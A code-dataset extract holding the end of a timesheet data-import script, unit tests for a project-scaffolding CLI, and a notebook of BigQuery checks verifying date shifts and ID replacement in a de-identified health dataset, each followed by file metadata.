, end = '12:00'
, work_location = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-24.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '17:00'
, end = '18:00'
, work_location = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-25.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:30'
, work_location = '2'
)
db.time_record.create \
( daily_record = dr
, start = '08:30'
, end = '12:00'
, work_location = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-26.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-27.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-28.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-29.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-30.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-01.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-02.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-03.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-04.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-05.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-06.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-07.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-08.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-09.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-10.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-11.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-12.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-13.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-14.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-15.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-16.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-17.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-18.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-19.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-20.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-21.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-22.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-23.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-24.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-25.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-26.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-27.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-28.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-29.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-30.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-31.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-11-01.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, duration = 7.5
, work_location = '5'
, wp = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-11-02.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-11-03.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-11-04.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-11-05.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-11-06.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-11-07.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-11-08.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-11-09.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-11-10.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.commit ()
# end def import_data_18
| 28.879749
| 64
| 0.408435
| 9,166
| 87,419
| 3.739363
| 0.01331
| 0.145062
| 0.094179
| 0.141269
| 0.991335
| 0.989322
| 0.987805
| 0.987688
| 0.983866
| 0.981152
| 0
| 0.127115
| 0.467885
| 87,419
| 3,026
| 65
| 28.889293
| 0.609713
| 0.000252
| 0
| 0.775463
| 0
| 0
| 0.079009
| 0
| 0
| 0
| 0
| 0
| 0.000661
| 1
| 0.000331
| false
| 0
| 0.000661
| 0
| 0.000992
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0686fff069deb82b8d08160d4b0a878dc045e130
| 6,003
|
py
|
Python
|
tests/test_etlskel_full.py
|
slouchart/pyetllib
|
133df36a1628f413cd60a86e4c7eac2738844d17
|
[
"MIT"
] | 2
|
2020-04-01T10:08:02.000Z
|
2021-03-07T15:18:14.000Z
|
tests/test_etlskel_full.py
|
slouchart/pyetllib
|
133df36a1628f413cd60a86e4c7eac2738844d17
|
[
"MIT"
] | null | null | null |
tests/test_etlskel_full.py
|
slouchart/pyetllib
|
133df36a1628f413cd60a86e4c7eac2738844d17
|
[
"MIT"
] | 1
|
2020-10-13T13:23:02.000Z
|
2020-10-13T13:23:02.000Z
|
from unittest import TestCase
from unittest import main as run_tests
from pathlib import Path
from click.testing import CliRunner
from src.pyetllib.etlskel.cli import etlskel
class TestEndToEndEtlSkel(TestCase):
def setUp(self):
self.runner = CliRunner()
self.root_dir = 'to_be_removed'
def assertPathPresent(self, *pathparts):
self.assertTrue(
Path().joinpath(*pathparts).exists(),
f"Path {Path().joinpath(*pathparts)} does not exist "
f"in the current directory"
)
def assertPathNotPresent(self, *pathparts):
self.assertFalse(
Path().joinpath(*pathparts).exists(),
f"Path {Path().joinpath(*pathparts)} does exist "
f"in the current directory"
)
def filesystem_cm(self):
return self.runner.isolated_filesystem()
def invoke_cli(self, opts):
return self.runner.invoke(etlskel, opts + [self.root_dir], input='y')
def test_basic_no_opts(self):
options = []
with self.filesystem_cm():
_ = self.invoke_cli(options)
self.assertPathPresent(self.root_dir)
self.assertPathPresent(self.root_dir, self.root_dir)
self.assertPathPresent(self.root_dir, self.root_dir,
'templates')
self.assertPathPresent(self.root_dir, 'tests')
self.assertPathPresent(self.root_dir, 'setup.py')
self.assertPathPresent(self.root_dir, 'README.md')
self.assertPathPresent(self.root_dir, 'MANIFEST.in')
def test_no_template(self):
options = ['--no-template-dir']
with self.filesystem_cm():
_ = self.invoke_cli(options)
self.assertPathPresent(self.root_dir)
self.assertPathPresent(self.root_dir, self.root_dir)
self.assertPathNotPresent(self.root_dir, self.root_dir,
'templates')
self.assertPathPresent(self.root_dir, 'tests')
self.assertPathPresent(self.root_dir, 'setup.py')
self.assertPathPresent(self.root_dir, 'README.md')
self.assertPathNotPresent(self.root_dir, 'MANIFEST.in')
def test_no_test(self):
options = ['--no-test-package']
with self.filesystem_cm():
_ = self.invoke_cli(options)
self.assertPathPresent(self.root_dir)
self.assertPathPresent(self.root_dir, self.root_dir)
self.assertPathPresent(self.root_dir, self.root_dir,
'templates')
self.assertPathNotPresent(self.root_dir, 'tests')
self.assertPathPresent(self.root_dir, 'setup.py')
self.assertPathPresent(self.root_dir, 'README.md')
self.assertPathPresent(self.root_dir, 'MANIFEST.in')
def test_no_template_no_test(self):
options = ['--no-test-package', '--no-template-dir']
with self.filesystem_cm():
_ = self.invoke_cli(options)
self.assertPathPresent(self.root_dir)
self.assertPathPresent(self.root_dir, self.root_dir)
self.assertPathNotPresent(self.root_dir, self.root_dir,
'templates')
self.assertPathNotPresent(self.root_dir, 'tests')
self.assertPathPresent(self.root_dir, 'setup.py')
self.assertPathPresent(self.root_dir, 'README.md')
self.assertPathNotPresent(self.root_dir, 'MANIFEST.in')
def test_with_src_dir(self):
options = ['-s']
with self.filesystem_cm():
_ = self.invoke_cli(options)
self.assertPathPresent(self.root_dir)
self.assertPathPresent(self.root_dir, 'src')
self.assertPathNotPresent(self.root_dir, self.root_dir)
self.assertPathPresent(self.root_dir, 'src', self.root_dir)
self.assertPathPresent(self.root_dir, 'src', self.root_dir,
'templates')
self.assertPathPresent(self.root_dir, 'tests')
self.assertPathPresent(self.root_dir, 'setup.py')
self.assertPathPresent(self.root_dir, 'README.md')
self.assertPathPresent(self.root_dir, 'MANIFEST.in')
def test_alt_package_name(self):
package = 'foo'
options = ['-p', package]
with self.filesystem_cm():
_ = self.invoke_cli(options)
self.assertPathPresent(self.root_dir)
self.assertPathNotPresent(self.root_dir, self.root_dir)
self.assertPathPresent(self.root_dir, package)
self.assertPathPresent(self.root_dir, package, 'templates')
self.assertPathPresent(self.root_dir, 'tests')
self.assertPathPresent(self.root_dir, 'setup.py')
self.assertPathPresent(self.root_dir, 'README.md')
self.assertPathPresent(self.root_dir, 'MANIFEST.in')
def all_opt_together(self):
package = 'foo'
options = [
'-p', package,
'-s',
'--no-test-package',
'--no-template-dir'
]
with self.filesystem_cm():
_ = self.invoke_cli(options)
self.assertPathPresent(self.root_dir)
self.assertPathNotPresent(self.root_dir, self.root_dir)
self.assertPathNotPresent(self.root_dir, package)
self.assertPathNotPresent(self.root_dir, package, 'templates')
self.assertPathPresent(self.root_dir, 'src', package)
self.assertPathNotPresent(self.root_dir, 'src', package,
'templates')
self.assertPathNotPresent(self.root_dir, 'tests')
self.assertPathPresent(self.root_dir, 'setup.py')
self.assertPathPresent(self.root_dir, 'README.md')
self.assertPathNotPresent(self.root_dir, 'MANIFEST.in')
def tearDown(self) -> None:
pass
if __name__ == '__main__':
run_tests(verbosity=2)
| 41.6875
| 77
| 0.613693
| 637
| 6,003
| 5.587127
| 0.120879
| 0.157348
| 0.216353
| 0.334083
| 0.834223
| 0.831413
| 0.787862
| 0.760326
| 0.759764
| 0.759764
| 0
| 0.00023
| 0.274863
| 6,003
| 143
| 78
| 41.979021
| 0.817367
| 0
| 0
| 0.576
| 0
| 0
| 0.09995
| 0.009662
| 0
| 0
| 0
| 0
| 0.472
| 1
| 0.104
| false
| 0.008
| 0.04
| 0.016
| 0.168
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
233ba1d3c7699ecb7452ec267a443083c7565517
| 15,702
|
py
|
Python
|
data_steward/analytics/rt_cdr_qc/cdr_deid_qa_report4_dateshift.py
|
lrwb-aou/curation
|
e80447e56d269dc2c9c8bc79e78218d4b0dc504c
|
[
"MIT"
] | 16
|
2017-06-30T20:05:05.000Z
|
2022-03-08T21:03:19.000Z
|
data_steward/analytics/rt_cdr_qc/cdr_deid_qa_report4_dateshift.py
|
lrwb-aou/curation
|
e80447e56d269dc2c9c8bc79e78218d4b0dc504c
|
[
"MIT"
] | 342
|
2017-06-23T21:37:40.000Z
|
2022-03-30T16:44:16.000Z
|
data_steward/analytics/rt_cdr_qc/cdr_deid_qa_report4_dateshift.py
|
lrwb-aou/curation
|
e80447e56d269dc2c9c8bc79e78218d4b0dc504c
|
[
"MIT"
] | 33
|
2017-07-01T00:12:20.000Z
|
2022-01-26T18:06:53.000Z
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.7.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] papermill={"duration": 0.024011, "end_time": "2021-02-02T22:30:31.951734", "exception": false, "start_time": "2021-02-02T22:30:31.927723", "status": "completed"} tags=[]
# # QA queries on new CDR_deid dateshift
#
# Quality checks performed on a new CDR dataset using QA queries
# + papermill={"duration": 0.709639, "end_time": "2021-02-02T22:30:32.661373", "exception": false, "start_time": "2021-02-02T22:30:31.951734", "status": "completed"} tags=[]
import urllib
import pandas as pd
pd.options.display.max_rows = 120
# + tags=["parameters"]
project_id = ""
com_cdr = ""
deid_cdr = ""
pipeline=""
# -
# df will have a summary in the end
df = pd.DataFrame(columns = ['query', 'result'])
# + [markdown] papermill={"duration": 0.02327, "end_time": "2021-02-02T22:30:32.708257", "exception": false, "start_time": "2021-02-02T22:30:32.684987", "status": "completed"} tags=[]
# # 1 DS_1 Verify that the field identified to follow the date shift rule as de-identification action in OBSERVATION table have been randomly date shifted.
# + papermill={"duration": 4.105203, "end_time": "2021-02-02T22:30:36.813460", "exception": false, "start_time": "2021-02-02T22:30:32.708257", "status": "completed"} tags=[]
query = f'''
WITH df1 AS (
SELECT
DATE_DIFF(DATE(i.observation_date), DATE(d.observation_date),day)-m.shift as diff
FROM `{project_id}.{pipeline}.pid_rid_mapping` m
JOIN `{project_id}.{com_cdr}.observation` i
ON m.person_id = i.person_id
JOIN `{project_id}.{deid_cdr}.observation` d
ON d.observation_id = i.observation_id)
SELECT COUNT(*) AS n_row_not_pass FROM df1
WHERE diff !=0
'''
df1=pd.read_gbq(query, dialect='standard')
if df1.eq(0).any().any():
df = df.append({'query' : 'Query1 OBSERVATION', 'result' : 'PASS'},
ignore_index = True)
else:
df = df.append({'query' : 'Query1 OBSERVATION', 'result' : ''},
ignore_index = True)
df1
# -
# # 3 DS_3 Verify that the field identified to follow the date shift rule as de-identification action in OBSERVATION_PERIOD table have been randomly date shifted.
# + papermill={"duration": 2.136748, "end_time": "2021-02-02T22:30:39.044867", "exception": false, "start_time": "2021-02-02T22:30:36.908119", "status": "completed"} tags=[]
query = f'''
WITH df1 AS (
SELECT
DATE_DIFF(DATE(i.observation_period_start_date), DATE(d.observation_period_start_date),day)-m.shift as diff
FROM `{project_id}.{pipeline}.pid_rid_mapping` m
JOIN `{project_id}.{com_cdr}.observation_period` i
ON m.person_id = i.person_id
JOIN `{project_id}.{deid_cdr}.observation_period` d
ON d.observation_period_id = i.observation_period_id)
SELECT COUNT(*) AS n_row_not_pass FROM df1
WHERE diff !=0
'''
df1=pd.read_gbq(query, dialect='standard')
if df1.eq(0).any().any():
df = df.append({'query' : 'Query3 OBSERVATION_PERIOD', 'result' : 'PASS'},
ignore_index = True)
else:
df = df.append({'query' : 'Query3 OBSERVATION_PERIOD', 'result' : ''},
ignore_index = True)
df1
# + [markdown] papermill={"duration": 0.023649, "end_time": "2021-02-02T22:30:39.115495", "exception": false, "start_time": "2021-02-02T22:30:39.091846", "status": "completed"} tags=[]
# # 4 DS_4 Verify that the field identified to follow the date shift rule as de-identification action in PERSON table have been randomly date shifted.
# + papermill={"duration": 2.338821, "end_time": "2021-02-02T22:30:41.501415", "exception": false, "start_time": "2021-02-02T22:30:39.162594", "status": "completed"} tags=[]
query = f'''
WITH df1 AS (
SELECT
DATE_DIFF(DATE(i.birth_datetime), DATE(d.birth_datetime),day)-m.shift as diff
FROM `{project_id}.{pipeline}.pid_rid_mapping` m
JOIN `{project_id}.{com_cdr}.person` i
ON m.person_id = i.person_id
JOIN `{project_id}.{deid_cdr}.person` d
ON d.person_id = m.research_id
)
SELECT COUNT(*) AS n_row_not_pass FROM df1
WHERE diff !=0
'''
df1=pd.read_gbq(query, dialect='standard')
if df1.eq(0).any().any():
df = df.append({'query' : 'Query4 Person table', 'result' : 'PASS'},
ignore_index = True)
else:
df = df.append({'query' : 'Query4 Person table', 'result' : ''},
ignore_index = True)
df1
# -
# # 5 DS_5 Verify that the field identified to follow the date shift rule as de-identification action in SPECIMEN table have been randomly date shifted.
# + papermill={"duration": 2.338821, "end_time": "2021-02-02T22:30:41.501415", "exception": false, "start_time": "2021-02-02T22:30:39.162594", "status": "completed"} tags=[]
query = f'''
WITH df1 AS (
SELECT
DATE_DIFF(DATE(i.specimen_date), DATE(d.specimen_date),day)-m.shift as diff
FROM `{project_id}.{pipeline}.pid_rid_mapping` m
JOIN `{project_id}.{com_cdr}.specimen` i
ON m.person_id = i.person_id
JOIN `{project_id}.{deid_cdr}.specimen` d
ON d.specimen_id = i.specimen_id
)
SELECT COUNT(*) AS n_row_not_pass FROM df1
WHERE diff !=0
'''
df1=pd.read_gbq(query, dialect='standard')
if df1.eq(0).any().any():
df = df.append({'query' : 'Query5 SPECIMEN', 'result' : 'PASS'},
ignore_index = True)
else:
df = df.append({'query' : 'Query5 SPECIMEN', 'result' : ''},
ignore_index = True)
df1
# -
# # 6 DS_6 Verify that the field identified to follow the date shift rule as de-identification action in DEATH table have been randomly date shifted.
query = f'''
WITH df1 AS (
SELECT
DATE_DIFF(DATE(i.death_date), DATE(d.death_date),day)-m.shift as diff
FROM `{project_id}.{pipeline}.pid_rid_mapping` m
JOIN `{project_id}.{com_cdr}.death` i
ON m.person_id = i.person_id
JOIN `{project_id}.{deid_cdr}.death` d
ON m.research_id = d.person_id
AND i.death_type_concept_id = d.death_type_concept_id
)
SELECT COUNT (*) AS n_row_not_pass FROM df1
WHERE diff !=0
'''
df1=pd.read_gbq(query, dialect='standard')
if df1.eq(0).any().any():
df = df.append({'query' : 'Query6 Death', 'result' : 'PASS'},
ignore_index = True)
else:
df = df.append({'query' : 'Query6 Death', 'result' : ''},
ignore_index = True)
df1
# + [markdown] papermill={"duration": 0.023411, "end_time": "2021-02-02T22:30:39.091846", "exception": false, "start_time": "2021-02-02T22:30:39.068435", "status": "completed"} tags=[]
# # 7 DS_7 Verify that the field identified to follow the date shift rule as de-identification action in VISIT OCCURENCE table have been randomly date shifted.
# -
query = f'''
WITH df1 AS (
SELECT
DATE_DIFF(DATE(i.visit_start_date), DATE(d.visit_start_date),day)-m.shift as diff
FROM `{project_id}.{pipeline}.pid_rid_mapping` m
JOIN `{project_id}.{com_cdr}.visit_occurrence` i
ON m.person_id = i.person_id
JOIN `{project_id}.{deid_cdr}.visit_occurrence` d
ON d.visit_occurrence_id = i.visit_occurrence_id
)
SELECT COUNT (*) AS n_row_not_pass FROM df1
WHERE diff !=0
'''
df1=pd.read_gbq(query, dialect='standard')
if df1.eq(0).any().any():
df = df.append({'query' : 'Query7 Visit', 'result' : 'PASS'},
ignore_index = True)
else:
df = df.append({'query' : 'Query7 Visit', 'result' : ''},
ignore_index = True)
df1
# # 8 DS_8 Verify that the field identified to follow the date shift rule as de-identification action in PROCEDURE OCCURENCE table have been randomly date shifted.
#
query = f'''
WITH df1 as (
SELECT
DATE_DIFF(DATE(i.procedure_date), DATE(d.procedure_date),day)-m.shift as diff
FROM `{project_id}.{pipeline}.pid_rid_mapping` m
JOIN `{project_id}.{com_cdr}.procedure_occurrence` i
ON m.person_id = i.person_id
JOIN `{project_id}.{deid_cdr}.procedure_occurrence` d
ON d.procedure_occurrence_id = i.procedure_occurrence_id
)
SELECT COUNT(*) AS n_row_not_pass FROM df1
WHERE diff !=0
'''
df1=pd.read_gbq(query, dialect='standard')
if df1.eq(0).any().any():
df = df.append({'query' : 'Query8 PROCEDURE', 'result' : 'PASS'},
ignore_index = True)
else:
df = df.append({'query' : 'Query8 PROCEDURE', 'result' : ''},
ignore_index = True)
df1
# # 9 DS_9 Verify that the field identified to follow the date shift rule as de-identification action in DRUG EXPOSURE table have been randomly date shifted.
query = f'''
WITH df1 AS (
SELECT
DATE_DIFF(DATE(i.drug_exposure_start_date), DATE(d.drug_exposure_start_date),day)-m.shift as diff
FROM `{project_id}.{pipeline}.pid_rid_mapping` m
JOIN `{project_id}.{com_cdr}.drug_exposure` i
ON m.person_id = i.person_id
JOIN `{project_id}.{deid_cdr}.drug_exposure` d
ON i.drug_exposure_id = d.drug_exposure_id
)
SELECT COUNT(*) AS n_row_not_pass FROM df1
WHERE diff !=0
'''
df9=pd.read_gbq(query, dialect='standard')
if df1.eq(0).any().any():
df = df.append({'query' : 'Query9 Drug table', 'result' : 'PASS'},
ignore_index = True)
else:
df = df.append({'query' : 'Query9 Drug table', 'result' : ''},
ignore_index = True)
df1
# # 10 DS_10 Verify that the field identified to follow the date shift rule as de-identification action in DEVICE EXPOSURE table have been randomly date shifted.
query = f'''
WITH df1 AS (
SELECT
DATE_DIFF(DATE(i.device_exposure_start_date), DATE(d.device_exposure_start_date),day)-m.shift as diff
FROM `{project_id}.{pipeline}.pid_rid_mapping` m
JOIN `{project_id}.{com_cdr}.device_exposure` i
ON m.person_id = i.person_id
JOIN `{project_id}.{deid_cdr}.device_exposure` d
ON i.device_exposure_id = d.device_exposure_id
)
SELECT COUNT(*) AS n_row_not_pass FROM df1
WHERE diff !=0
'''
df1=pd.read_gbq(query, dialect='standard')
if df1.eq(0).any().any():
df = df.append({'query' : 'Query10 Device', 'result' : 'PASS'},
ignore_index = True)
else:
df = df.append({'query' : 'Query10 Device', 'result' : ''},
ignore_index = True)
df1
# # 11 DS_11 Verify that the field identified to follow the date shift rule as de-identification action in CONDITION OCCURENCE table have been randomly date shifted.
query = f'''
WITH df1 AS (
SELECT
DATE_DIFF(DATE(i.condition_start_date), DATE(d.condition_start_date),day)-m.shift as diff
FROM `{project_id}.{pipeline}.pid_rid_mapping` m
JOIN `{project_id}.{com_cdr}.condition_occurrence` i
ON m.person_id = i.person_id
JOIN `{project_id}.{deid_cdr}.condition_occurrence` d
ON i.condition_occurrence_id = d.condition_occurrence_id
)
SELECT COUNT(*) AS n_row_not_pass FROM df1
WHERE diff !=0
'''
df1=pd.read_gbq(query, dialect='standard')
if df1.eq(0).any().any():
df = df.append({'query' : 'Query11 Condition table', 'result' : 'PASS'},
ignore_index = True)
else:
df = df.append({'query' : 'Query11 Condition table', 'result' : ''},
ignore_index = True)
df1
# # 12 DS_12 Verify that the field identified to follow the date shift rule as de-identification action in MEASUREMENT table have been randomly date shifted.
# +
query = f'''
WITH df1 AS (
SELECT
DATE_DIFF(DATE(i.measurement_date), DATE(d.measurement_date),day)-m.shift as diff
FROM `{project_id}.{pipeline}.pid_rid_mapping` m
JOIN `{project_id}.{com_cdr}.measurement` i
ON m.person_id = i.person_id
JOIN `{project_id}.{deid_cdr}.measurement` d
ON d.measurement_id = i.measurement_id
)
SELECT COUNT(*) AS n_row_not_pass FROM df1
WHERE diff !=0
'''
df1=pd.read_gbq(query, dialect='standard')
if df1.eq(0).any().any():
df = df.append({'query' : 'Query12 Measurement', 'result' : 'PASS'},
ignore_index = True)
else:
df = df.append({'query' : 'Query12 Measurement', 'result' : ''},
ignore_index = True)
df1
# -
# # 13 DS_13 Verify the date shift has been implemented following the date shift noted in the deid_map table in the non-deid dataset.
query = f'''
SELECT COUNT (*) AS n_row_not_pass
FROM `{project_id}.{pipeline}.pid_rid_mapping`
WHERE shift <=0
'''
df1=pd.read_gbq(query, dialect='standard')
if df1.eq(0).any().any():
df = df.append({'query' : 'Query13 date shifted in non_deid', 'result' : 'PASS'},
ignore_index = True)
else:
df = df.append({'query' : 'Query13 date shifited in non_deid', 'result' : ''},
ignore_index = True)
df1
# # 14 DS_14 Verify that person_id has been replaced by research_id
#
#
# checked total 8 tables including specimen etc tables in deid. However will be hard to check person or death tables without row_id.
query = f'''
WITH df1 AS (
SELECT COUNT (*) AS n_row_not_pass
FROM `{project_id}.{com_cdr}.observation` non_deid
JOIN `{project_id}.{pipeline}.pid_rid_mapping` m
ON m.person_id=non_deid.person_id
JOIN `{project_id}.{deid_cdr}.observation` deid USING(observation_id)
WHERE deid.person_id !=m.research_id
),
df2 AS (
SELECT COUNT (*) AS n_row_not_pass
FROM `{project_id}.{com_cdr}.measurement` non_deid
JOIN `{project_id}.{pipeline}.pid_rid_mapping` m
ON m.person_id=non_deid.person_id
JOIN `{project_id}.{deid_cdr}.measurement` deid USING(measurement_id)
WHERE deid.person_id !=m.research_id
),
df3 AS (
SELECT COUNT (*) AS n_row_not_pass
FROM `{project_id}.{com_cdr}.condition_occurrence` non_deid
JOIN `{project_id}.{pipeline}.pid_rid_mapping` m
ON m.person_id=non_deid.person_id
JOIN `{project_id}.{deid_cdr}.condition_occurrence` deid USING(condition_occurrence_id)
WHERE deid.person_id !=m.research_id
),
df4 AS (
SELECT COUNT (*) AS n_row_not_pass
FROM `{project_id}.{com_cdr}.drug_exposure` non_deid
JOIN `{project_id}.{pipeline}.pid_rid_mapping` m
ON m.person_id=non_deid.person_id
JOIN `{project_id}.{deid_cdr}.drug_exposure` deid USING(drug_exposure_id)
WHERE deid.person_id !=m.research_id
),
df5 AS (
SELECT COUNT (*) AS n_row_not_pass
FROM `{project_id}.{com_cdr}.device_exposure` non_deid
JOIN `{project_id}.{pipeline}.pid_rid_mapping` m
ON m.person_id=non_deid.person_id
JOIN `{project_id}.{deid_cdr}.device_exposure` deid USING(device_exposure_id)
WHERE deid.person_id !=m.research_id
),
df6 AS (
SELECT COUNT (*) AS n_row_not_pass
FROM `{project_id}.{com_cdr}.procedure_occurrence` non_deid
JOIN `{project_id}.{pipeline}.pid_rid_mapping` m
ON m.person_id=non_deid.person_id
JOIN `{project_id}.{deid_cdr}.procedure_occurrence` deid USING(procedure_occurrence_id)
WHERE deid.person_id !=m.research_id
),
df7 AS (
SELECT COUNT (*) AS n_row_not_pass
FROM `{project_id}.{com_cdr}.visit_occurrence` non_deid
JOIN `{project_id}.{pipeline}.pid_rid_mapping` m
ON m.person_id=non_deid.person_id
JOIN `{project_id}.{deid_cdr}.visit_occurrence` deid USING(visit_occurrence_id)
WHERE deid.person_id !=m.research_id
),
df8 AS (
SELECT COUNT (*) AS n_row_not_pass
FROM `{project_id}.{com_cdr}.specimen` non_deid
JOIN `{project_id}.{pipeline}.pid_rid_mapping` m
ON m.person_id=non_deid.person_id
JOIN `{project_id}.{deid_cdr}.specimen` deid USING(specimen_id)
WHERE deid.person_id !=m.research_id
)
SELECT * FROM df1
JOIN df2 USING(n_row_not_pass)
JOIN df3 USING(n_row_not_pass)
JOIN df4 USING(n_row_not_pass)
JOIN df5 USING(n_row_not_pass)
JOIN df6 USING(n_row_not_pass)
JOIN df7 USING(n_row_not_pass)
JOIN df8 USING(n_row_not_pass)
'''
df1=pd.read_gbq(query, dialect='standard')
if df1.eq(0).any().any():
df = df.append({'query' : 'Query14.3 person_id replaed by research_id in other 8 tables', 'result' : 'PASS'},
ignore_index = True)
else:
df = df.append({'query' : 'Query14.3 person_id replaed by research_id in other 8 tables', 'result' : ''},
ignore_index = True)
df1
# # Summary_dateshift
# if not pass, will be highlighted in red
df = df.mask(df.isin(['Null','']))
df.style.highlight_null(null_color='red').set_properties(**{'text-align': 'left'})
| 34.893333
| 184
| 0.703223
| 2,493
| 15,702
| 4.225431
| 0.093061
| 0.050408
| 0.046896
| 0.028194
| 0.808715
| 0.784128
| 0.753275
| 0.713404
